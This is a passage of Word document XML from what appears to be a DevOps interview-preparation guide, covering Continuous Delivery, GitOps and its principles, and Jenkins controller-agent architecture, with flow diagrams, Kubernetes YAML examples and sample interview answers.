        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Continuous Delivery Flow</w:t>
        <w:br/>
        <w:t>Developer Commit</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>CI Pipeline</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>Build Application</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>Run Tests</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>Code Quality Checks</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>Security Scans</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>Create Artifact</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>Deploy to Staging/UAT</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>Manual Approval</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>Deploy to Production</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>A developer pushes code to GitHub:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               1. Jenkins/GitHub Actions triggers the pipeline.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               2. Application is built.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               3. Unit and integration tests run.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               4. Security and quality checks pass.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               5. Docker image is created.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               6. Image is pushed to a registry.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               7. Application is deployed to a staging environment.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               8. After business or QA approval, it is deployed to production.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Faster and more reliable releases</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reduced deployment risk</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Consistent deployment process</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Early detection of issues</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Easy rollback and release management</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Continuous Delivery vs Continuous Deployment</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Continuous Delivery</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Continuous Deployment</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Production Approval</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Required</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Not Required</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Human Intervention</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Final deployment only</w:t>
        <w:br/>
        <w:tab/>
        <w:t>None</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Release Control</w:t>
        <w:br/>
        <w:tab/>
        <w:t>More control</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Fully automated</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Risk</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lower</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Higher if testing is weak</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Jenkins</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * GitHub Actions</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * GitLab CI/CD</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Argo CD</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Azure DevOps</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-World Example</w:t>
        <w:br/>
        <w:t>In a Kubernetes project:</w:t>
        <w:br/>
        <w:t>Code Commit</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Jenkins CI</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Build Docker Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Push to Artifact Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Deploy to Staging Cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>QA Validation</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Manual Approval</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Deploy to Production Cluster</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (1 Minute)</w:t>
        <w:br/>
        <w:t>Continuous Delivery is a software development practice where every code change is automatically built, tested, and packaged for deployment. The application is deployed to staging or pre-production environments automatically, but production deployment requires manual approval. This approach ensures that software is always ready for release while maintaining control over production deployments. In my projects, I have used Jenkins, GitHub Actions, Docker, Kubernetes, and ArgoCD to implement Continuous Delivery pipelines that automate build, test, packaging, and staging deployments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q507. Explain GitOps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is GitOps?</w:t>
        <w:br/>
        <w:t>GitOps is an operational framework that uses Git as the single source of truth for both application deployments and infrastructure management.</w:t>
        <w:br/>
        <w:t>Instead of manually deploying changes to Kubernetes or cloud environments, you make changes in Git, and a GitOps tool automatically synchronizes those changes to the target environment.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core Idea</w:t>
        <w:br/>
        <w:t>“If it’s running in production, it should be defined in Git.”</w:t>
        <w:br/>
        <w:t>Git stores:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes manifests</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Helm charts</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Terraform code</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Application configurations</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Infrastructure definitions</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>GitOps Workflow</w:t>
        <w:br/>
        <w:t>Developer Change</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>Git Repository</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>Pull Request Review</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>Merge to Main Branch</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>GitOps Tool Detects Change</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>Sync to Kubernetes Cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>Application Updated</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Suppose your application is running with 3 replicas:</w:t>
        <w:br/>
        <w:t>replicas: 3</w:t>
        <w:br/>
        <w:t>You want to scale it to 5 replicas.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               1. Update the YAML file in Git:</w:t>
        <w:br/>
        <w:t>replicas: 5</w:t>
        <w:br/>
        <w:t xml:space="preserve">               2. Create a Pull Request.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               3. After approval, merge it.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               4. GitOps tool detects the change.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               5. Kubernetes cluster is automatically updated to 5 replicas.</w:t>
        <w:br/>
        <w:t>No manual kubectl apply is needed.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key Principles</w:t>
        <w:br/>
        <w:t>1. Git as Source of Truth</w:t>
        <w:br/>
        <w:t>The desired state of infrastructure and applications is stored in Git.</w:t>
        <w:br/>
        <w:t>2. Declarative Configuration</w:t>
        <w:br/>
        <w:t>Infrastructure is described declaratively.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>replicas: 3</w:t>
        <w:br/>
        <w:t>image: app:v1</w:t>
        <w:br/>
        <w:t>3. Automated Reconciliation</w:t>
        <w:br/>
        <w:t>GitOps tools continuously compare:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Desired state (Git)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Actual state (Cluster)</w:t>
        <w:br/>
        <w:t>If drift occurs, they automatically correct it.</w:t>
        <w:br/>
        <w:t>4. Pull-Based Deployments</w:t>
        <w:br/>
        <w:t>The cluster pulls changes from Git rather than external systems pushing changes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t>✅ Version control for infrastructure</w:t>
        <w:br/>
        <w:t>✅ Easy rollback</w:t>
        <w:br/>
        <w:t>✅ Audit trail of all changes</w:t>
        <w:br/>
        <w:t>✅ Faster deployments</w:t>
        <w:br/>
        <w:t>✅ Reduced manual errors</w:t>
        <w:br/>
        <w:t>✅ Improved security</w:t>
        <w:br/>
        <w:t>✅ Drift detection and correction</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Popular GitOps Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Argo CD</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Flux</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>GitOps vs Traditional CI/CD</w:t>
        <w:br/>
        <w:t>Traditional CI/CD</w:t>
        <w:br/>
        <w:tab/>
        <w:t>GitOps</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pipeline pushes changes to cluster</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cluster pulls changes from Git</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Deployment state may differ</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Git is always the source of truth</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Manual kubectl commands possible</w:t>
        <w:br/>
        <w:tab/>
        <w:t>All changes go through Git</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited auditability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complete audit trail</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-World Example (GKE)</w:t>
        <w:br/>
        <w:t>Developer</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>GitHub Repository</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Pull Request Approval</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Merge to Main</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>ArgoCD Watches Repository</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Syncs Changes</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>GKE Cluster Updated</w:t>
        <w:br/>
        <w:t>If someone manually changes a deployment in GKE:</w:t>
        <w:br/>
        <w:t>kubectl scale deployment app --replicas=10</w:t>
        <w:br/>
        <w:t>but Git says:</w:t>
        <w:br/>
        <w:t>replicas: 5</w:t>
        <w:br/>
        <w:t>ArgoCD detects the drift and automatically reverts the cluster back to 5 replicas.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (1–2 Minutes)</w:t>
        <w:br/>
        <w:t>GitOps is a deployment and operations methodology that uses Git as the single source of truth for infrastructure and application configurations. All changes are made through Git pull requests, reviewed, and merged before being applied. A GitOps tool such as ArgoCD continuously monitors the repository and synchronizes the desired state stored in Git with the actual state of the Kubernetes cluster. This approach provides version control, auditability, automated rollbacks, drift detection, and consistent deployments. In production environments, GitOps helps improve reliability, security, and operational efficiency by eliminating manual deployment steps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q508. What are GitOps principles?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GitOps Principles</w:t>
        <w:br/>
        <w:t>GitOps is based on four core principles:</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. Declarative Configuration</w:t>
        <w:br/>
        <w:t>The entire system (applications and infrastructure) should be described declaratively.</w:t>
        <w:br/>
        <w:t>Instead of writing commands like:</w:t>
        <w:br/>
        <w:t>kubectl scale deployment app --replicas=5</w:t>
        <w:br/>
        <w:t>you define the desired state in a file:</w:t>
        <w:br/>
        <w:t>apiVersion: apps/v1</w:t>
        <w:br/>
        <w:t>kind: Deployment</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  replicas: 5</w:t>
        <w:br/>
        <w:t>This makes the infrastructure reproducible and version-controlled.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Git as the Single Source of Truth</w:t>
        <w:br/>
        <w:t>All infrastructure and application configurations are stored in Git.</w:t>
        <w:br/>
        <w:t>Examples:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes manifests</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Helm charts</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Terraform code</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Application configurations</w:t>
        <w:br/>
        <w:t>Every change must go through:</w:t>
        <w:br/>
        <w:t>Code Change</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Pull Request</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Review</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Merge</w:t>
        <w:br/>
        <w:t>Git becomes the authoritative record of the desired state.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Automated Reconciliation</w:t>
        <w:br/>
        <w:t>A GitOps agent continuously compares:</w:t>
        <w:br/>
        <w:t>Desired State (Git)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        vs</w:t>
        <w:br/>
        <w:t>Actual State (Cluster)</w:t>
        <w:br/>
        <w:t>If differences are detected, the agent automatically brings the cluster back to the state defined in Git.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>Git:</w:t>
        <w:br/>
        <w:t>replicas: 3</w:t>
        <w:br/>
        <w:t>Cluster:</w:t>
        <w:br/>
        <w:t>replicas: 5</w:t>
        <w:br/>
        <w:t>GitOps tool will automatically reset the cluster to:</w:t>
        <w:br/>
        <w:t>replicas: 3</w:t>
        <w:br/>
        <w:t>This is called drift correction.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Continuous Synchronization &amp; Self-Healing</w:t>
        <w:br/>
        <w:t>The GitOps controller continuously monitors Git repositories and cluster state.</w:t>
        <w:br/>
        <w:t>Whenever:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * A new commit is merged</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Configuration changes</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Drift occurs</w:t>
        <w:br/>
        <w:t>The controller automatically synchronizes the environment.</w:t>
        <w:br/>
        <w:t>Benefits:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Self-healing</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Faster deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reduced operational errors</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>GitOps Principles Summary</w:t>
        <w:br/>
        <w:t>Principle</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Description</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Declarative</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Define desired state in code (YAML, Terraform, Helm)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Versioned &amp; Immutable</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Store everything in Git</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Automatically Pulled</w:t>
        <w:br/>
        <w:tab/>
        <w:t>GitOps agents pull changes from Git</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Continuously Reconciled</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Desired and actual states are constantly synchronized</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example with ArgoCD</w:t>
        <w:br/>
        <w:t>Developer</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Git Commit</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Pull Request</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Merge</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Git Repository</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>ArgoCD Watches Git</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Synchronizes Cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Application Updated</w:t>
        <w:br/>
        <w:t>If someone manually changes the cluster:</w:t>
        <w:br/>
        <w:t>kubectl delete deployment app</w:t>
        <w:br/>
        <w:t>ArgoCD detects that the deployment still exists in Git and automatically recreates it.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (1 Minute)</w:t>
        <w:br/>
        <w:t>GitOps is based on four key principles. First, the system must be declaratively defined using configuration files such as Kubernetes manifests or Terraform code. Second, Git acts as the single source of truth where all changes are version controlled. Third, GitOps tools continuously reconcile the desired state stored in Git with the actual state running in the environment. Finally, synchronization is automated and self-healing, ensuring any configuration drift is detected and corrected automatically. These principles provide auditability, consistency, rollback capabilities, and reliable deployments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q509. Explain Jenkins architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Jenkins Architecture</w:t>
        <w:br/>
        <w:t>Jenkins is an open-source automation server used to automate build, test, and deployment processes in CI/CD pipelines.</w:t>
        <w:br/>
        <w:t>Its architecture follows a Controller-Agent (Master-Agent) model.</w:t>
        <w:br/>
        <w:t>Jenkins Architecture Diagram</w:t>
        <w:br/>
        <w:t xml:space="preserve">                   Developers</w:t>
        <w:br/>
        <w:t xml:space="preserve">                         |</w:t>
        <w:br/>
        <w:t xml:space="preserve">                         v</w:t>
        <w:br/>
        <w:t xml:space="preserve">                    GitHub/GitLab</w:t>
        <w:br/>
        <w:t xml:space="preserve">                         |</w:t>
        <w:br/>
        <w:t xml:space="preserve">                         v</w:t>
        <w:br/>
        <w:t xml:space="preserve">                Jenkins Controller</w:t>
        <w:br/>
        <w:t xml:space="preserve">               (Master Node)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         +----------------------+</w:t>
        <w:br/>
        <w:t xml:space="preserve">         | Scheduler            |</w:t>
        <w:br/>
        <w:t xml:space="preserve">         | Job Management       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">         | Plugins              |</w:t>
        <w:br/>
        <w:t xml:space="preserve">         | UI &amp; Configuration   |</w:t>
        <w:br/>
        <w:t xml:space="preserve">         +----------------------+</w:t>
        <w:br/>
        <w:t xml:space="preserve">              /          \</w:t>
        <w:br/>
        <w:t xml:space="preserve">             /            \</w:t>
        <w:br/>
        <w:t xml:space="preserve">            v              v</w:t>
        <w:br/>
        <w:t xml:space="preserve">     Jenkins Agent 1   Jenkins Agent 2</w:t>
        <w:br/>
        <w:t xml:space="preserve">      (Linux Build)     (Windows Build)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            |                  |</w:t>
        <w:br/>
        <w:t xml:space="preserve">            v                  v</w:t>
        <w:br/>
        <w:t xml:space="preserve">      Build/Test App      Build/Test App</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. Jenkins Controller (Master)</w:t>
        <w:br/>
        <w:t>The Controller is the central component responsible for:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Managing Jenkins configuration</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Scheduling jobs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Managing agents</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Installing plugins</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Monitoring pipeline execution</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Providing the Jenkins web UI</w:t>
        <w:br/>
        <w:t>Responsibilities</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Receives build triggers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Assigns jobs to agents</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Maintains build history</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Stores pipeline definitions</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Coordinates distributed builds</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Jenkins Agents (Workers)</w:t>
        <w:br/>
        <w:t>Agents are machines that execute the actual jobs assigned by the Controller.</w:t>
        <w:br/>
        <w:t>They can be:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Physical servers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Virtual machines</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Docker Containers</w:t>
        <w:br/>
        <w:t>Responsibilities</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Build code</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Run tests</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Execute deployment scripts</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Generate artifacts</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>Agent 1 → Java Build</w:t>
        <w:br/>
        <w:t>Agent 2 → Python Build</w:t>
        <w:br/>
        <w:t>Agent 3 → Docker Build</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Communication Between Controller and Agents</w:t>
        <w:br/>
        <w:t>Jenkins Controller communicates with agents through:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * SSH</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * JNLP (Java Network Launch Protocol)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * WebSocket</w:t>
        <w:br/>
        <w:t>Common setup:</w:t>
        <w:br/>
        <w:t>Controller</w:t>
        <w:br/>
        <w:t xml:space="preserve">     |</w:t>
        <w:br/>
        <w:t xml:space="preserve">     | SSH</w:t>
        <w:br/>
        <w:t xml:space="preserve">     |</w:t>
        <w:br/>
        <w:t>Agent</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Jenkins Pipeline</w:t>
        <w:br/>
        <w:t>A Pipeline is a series of automated stages.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>Checkout Code</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ↓</w:t>
        <w:br/>
        <w:t>Build</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ↓</w:t>
        <w:br/>
        <w:t>Unit Test</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ↓</w:t>
        <w:br/>
        <w:t>Security Scan</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ↓</w:t>
        <w:br/>
        <w:t>Docker Build</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ↓</w:t>
        <w:br/>
        <w:t>Push Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ↓</w:t>
        <w:br/>
        <w:t>Deploy</w:t>
        <w:br/>
        <w:t>Pipeline code is stored in a file called:</w:t>
        <w:br/>
        <w:t>Jenkinsfile</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. Jenkins Plugins</w:t>
        <w:br/>
        <w:t>Jenkins is highly extensible through plugins.</w:t>
        <w:br/>
        <w:t>Popular plugins:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Git Plugin</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Docker Plugin</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes Plugin</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * SonarQube Scanner for Jenkins</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Slack Notification Plugin</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-World CI/CD Flow</w:t>
        <w:br/>
        <w:t>Developer Pushes Code</w:t>
        <w:br/>
        <w:t xml:space="preserve">         ↓</w:t>
        <w:br/>
        <w:t>GitHub Webhook</w:t>
        <w:br/>
        <w:t xml:space="preserve">         ↓</w:t>
        <w:br/>
        <w:t>Jenkins Controller</w:t>
        <w:br/>
        <w:t xml:space="preserve">         ↓</w:t>
        <w:br/>
        <w:t>Assign Job to Agent</w:t>
        <w:br/>
        <w:t xml:space="preserve">         ↓</w:t>
        <w:br/>
        <w:t>Build Application</w:t>
        <w:br/>
        <w:t xml:space="preserve">         ↓</w:t>
        <w:br/>
        <w:t>Run Tests</w:t>
        <w:br/>
        <w:t xml:space="preserve">         ↓</w:t>
        <w:br/>
        <w:t>Build Docker Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">         ↓</w:t>
        <w:br/>
        <w:t>Push to Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">         ↓</w:t>
        <w:br/>
        <w:t>Deploy to Kubernetes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Use Multiple Agents?</w:t>
        <w:br/>
        <w:t>Benefits:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Parallel execution</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Faster builds</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Better resource utilization</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Platform-specific builds</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>Linux Agent    → Backend Build</w:t>
        <w:br/>
        <w:t>Windows Agent  → .NET Build</w:t>
        <w:br/>
        <w:t>Mac Agent      → iOS Build</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (2 Minutes)</w:t>
        <w:br/>
